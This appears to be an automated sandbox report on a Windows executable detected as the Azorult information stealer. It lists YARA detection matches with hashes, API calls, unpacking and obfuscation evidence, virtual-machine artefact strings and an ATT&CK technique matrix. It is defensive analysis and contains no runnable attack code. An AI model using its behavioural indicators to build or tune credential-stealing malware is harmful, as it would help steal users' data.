Source: 0.2.8p5iD52knN.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 0.3.8p5iD52knN.exe.5e0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 0.3.8p5iD52knN.exe.5e0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.3.8p5iD52knN.exe.5e0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.8p5iD52knN.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 0.2.8p5iD52knN.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.2.8p5iD52knN.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1908645420.000000000061F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@2/5@0/1

Source: C:\Users\user\Desktop\8p5iD52knN.exe

Code function: 0_2_00438763 LoadLibraryA,CreateToolhelp32Snapshot,Module32FirstW,

0_2_00438763

Source: C:\Users\user\Desktop\8p5iD52knN.exe

Code function: 0_2_0040A4A4 CoCreateInstance,

0_2_0040A4A4

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7064
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Mutant created: \Sessions\1\BaseNamedObjects\AFA7A44E6-9414907A-8AD8678F-B2F2A972-70ADDC33

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\516182ca-4568-46e9-ba7e-b6d99dee014c

Jump to behavior

Source: 8p5iD52knN.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\8p5iD52knN.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 8p5iD52knN.exe	Virustotal: Detection: 62%
Source: 8p5iD52knN.exe	ReversingLabs: Detection: 94%

Source: unknown	Process created: C:\Users\user\Desktop\8p5iD52knN.exe "C:\Users\user\Desktop\8p5iD52knN.exe"
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7064 -s 1016

Source: C:\Users\user\Desktop\8p5iD52knN.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Section loaded: crtdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\8p5iD52knN.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\8p5iD52knN.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: 8p5iD52knN.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 8p5iD52knN.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 8p5iD52knN.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 8p5iD52knN.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 8p5iD52knN.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\8p5iD52knN.exe

Unpacked PE file: 0.2.8p5iD52knN.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.mysec3:W;.rsrc:R;.reloc:R; vs CODE:ER;DATA:W;BSS:W;.idata:W;.reloc:R;

Source: C:\Users\user\Desktop\8p5iD52knN.exe

Code function: 0_2_00417B1A LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

0_2_00417B1A

Source: 8p5iD52knN.exe

Static PE information: section name: .mysec3

Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_0040D86E push 0040D89Ch; ret	0_2_0040D894
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_0040D870 push 0040D89Ch; ret	0_2_0040D894
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_004140C0 push 004140ECh; ret	0_2_004140E4
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_004108C8 push 004108F4h; ret	0_2_004108EC
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_0040B0F7 push 0040B124h; ret	0_2_0040B11C
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_0040B0F8 push 0040B124h; ret	0_2_0040B11C
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_00408080 push 004080B8h; ret	0_2_004080B0
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_00408158 push 00408196h; ret	0_2_0040818E
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_00408970 push 004089E4h; ret	0_2_004089DC
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_00408994 push 004089E4h; ret	0_2_004089DC
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_004089AC push 004089E4h; ret	0_2_004089DC
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_00415208 push 0041528Ch; ret	0_2_00415284
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_0040CA0C push 0040CA3Ch; ret	0_2_0040CA34
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_0040CA10 push 0040CA3Ch; ret	0_2_0040CA34
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_00417AEC push 00417B18h; ret	0_2_00417B10
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_00404BC0 push 00404C11h; ret	0_2_00404C09
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_0040D3C0 push 0040D3ECh; ret	0_2_0040D3E4
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_0040A3E4 push 0040A410h; ret	0_2_0040A408
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_0040C390 push 0040C3C0h; ret	0_2_0040C3B8
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_0040C394 push 0040C3C0h; ret	0_2_0040C3B8
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_0040A3AC push 0040A3D8h; ret	0_2_0040A3D0
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_0040DC44 push 0040DCA3h; ret	0_2_0040DC9B
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_0040DC0C push 0040DC38h; ret	0_2_0040DC30
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_0040B41E push 0040B44Ch; ret	0_2_0040B444
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_0040B420 push 0040B44Ch; ret	0_2_0040B444
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_0040A438 push 0040A464h; ret	0_2_0040A45C
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_0041A4F4 push 0041A51Ah; ret	0_2_0041A512
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_00414C80 push 00414CACh; ret	0_2_00414CA4
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_00409488 push 004094B8h; ret	0_2_004094B0
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_0041A4AC push 0041A4E8h; ret	0_2_0041A4E0
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_00418CB8 push 00418CE8h; ret	0_2_00418CE0

Source: 8p5iD52knN.exe

Static PE information: section name: .text entropy: 6.975637092375793

Source: C:\Users\user\Desktop\8p5iD52knN.exe

0_2_00417B1A

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_0041303C FindFirstFileW,FindNextFileW,FindClose,	0_2_0041303C
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,	0_2_004111C4
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	0_2_00414408
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	0_2_00414408
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,	0_2_00412D70
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,	0_2_00412D70
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,	0_2_00412D70
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_0041158C FindFirstFileW,FindNextFileW,FindClose,	0_2_0041158C
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_00411590 FindFirstFileW,FindNextFileW,FindClose,	0_2_00411590
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,	0_2_00412D9C

Source: C:\Users\user\Desktop\8p5iD52knN.exe

Code function: 0_2_00416740 GetSystemInfo,

0_2_00416740

Source: Amcache.hve.3.dr	Binary or memory string: VMware
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.3.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.3.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.3.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.3.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.3.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: 8p5iD52knN.exe, 00000000.00000002.1908661617.0000000000635000.00000004.00000020.00020000.00000000.sdmp, 8p5iD52knN.exe, 00000000.00000002.1908661617.0000000000682000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.3.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.3.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.3.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.3.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.3.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.3.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.3.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.3.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.3.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.3.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.3.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.3.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.3.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.3.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.3.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.3.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\8p5iD52knN.exe

0_2_00417B1A

Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_00407A34 mov eax, dword ptr fs:[00000030h]	0_2_00407A34
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_00620B08 mov eax, dword ptr fs:[00000030h]	0_2_00620B08
Source: C:\Users\user\Desktop\8p5iD52knN.exe	Code function: 0_2_006206A3 mov eax, dword ptr fs:[00000030h]	0_2_006206A3

Source: C:\Users\user\Desktop\8p5iD52knN.exe

Code function: GetLocaleInfoA,

0_2_00404B4C

Source: C:\Users\user\Desktop\8p5iD52knN.exe

0_2_004381A5

Source: C:\Users\user\Desktop\8p5iD52knN.exe

0_2_004381A5

Source: C:\Users\user\Desktop\8p5iD52knN.exe

Code function: 0_2_004065CC GetUserNameW,

0_2_004065CC

Source: C:\Users\user\Desktop\8p5iD52knN.exe

Code function: 0_2_00420076 GetTimeZoneInformation,

0_2_00420076

Source: C:\Users\user\Desktop\8p5iD52knN.exe

Code function: 0_2_00404C15 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId,

0_2_00404C15

Source: C:\Users\user\Desktop\8p5iD52knN.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.3.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Azorult

Source: Yara match	File source: 0.3.8p5iD52knN.exe.5e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8p5iD52knN.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.8p5iD52knN.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8p5iD52knN.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 8p5iD52knN.exe PID: 7064, type: MEMORYSTR

Yara detected Azorult Info Stealer

Source: Yara match	File source: 0.3.8p5iD52knN.exe.5e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8p5iD52knN.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.8p5iD52knN.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8p5iD52knN.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1724845045.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 8p5iD52knN.exe PID: 7064, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	2 Process Injection	2 Process Injection	OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	1 Clipboard Data	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Software Packing	NTDS	1 Account Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 System Owner/User Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
